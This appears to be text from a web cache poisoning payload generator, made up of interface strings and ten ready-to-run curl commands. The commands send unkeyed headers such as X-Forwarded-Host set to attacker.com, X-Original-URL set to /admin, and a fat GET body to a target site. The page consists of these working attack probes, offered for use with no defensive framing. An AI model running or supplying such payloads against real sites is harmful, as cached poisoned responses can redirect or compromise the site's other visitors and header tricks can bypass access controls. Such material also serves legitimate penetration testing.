$loading...
Configure the target and attack parameters to generate payloads.
Full URL including path
Key Unkeyed Headers
X-Forwarded-HostX-Original-URLX-Forwarded-SchemeX-HostX-Forwarded-Server# ─── Unkeyed Header Probes ───────────────────────────────────────────────
# These headers are commonly excluded from the cache key.
# If the backend reflects their value, the poisoned response may be cached.
# 1. X-Forwarded-Host (most common)
curl -s -o /dev/null -D - \
-H "X-Forwarded-Host: attacker.com" \
"https://target.com/page"
# 2. X-Original-URL
curl -s -o /dev/null -D - \
-H "X-Original-URL: /admin" \
"https://target.com/page"
# 3. X-Rewrite-URL
curl -s -o /dev/null -D - \
-H "X-Rewrite-URL: /admin" \
"https://target.com/page"
# 4. X-Forwarded-Scheme + X-Forwarded-Host (combined)
curl -s -o /dev/null -D - \
-H "X-Forwarded-Scheme: nothttps" \
-H "X-Forwarded-Host: attacker.com" \
"https://target.com/page"
# 5. X-Host header
curl -s -o /dev/null -D - \
-H "X-Host: attacker.com" \
"https://target.com/page"
# 6. X-Forwarded-Server
curl -s -o /dev/null -D - \
-H "X-Forwarded-Server: attacker.com" \
"https://target.com/page"
# 7. X-HTTP-Method-Override
curl -s -o /dev/null -D - \
-H "X-HTTP-Method-Override: GET" \
"https://target.com/page"
# 8. Fat GET (body in GET request)
curl -s -o /dev/null -D - \
-X GET -d "param=INJECTED_VALUE" \
"https://target.com/page"
# 9. X-Forwarded-Port
curl -s -o /dev/null -D - \
-H "X-Forwarded-Port: 443" \
"https://target.com/page"
# 10. True-Client-IP
curl -s -o /dev/null -D - \
-H "True-Client-IP: 127.0.0.1" \
"https://target.com/page"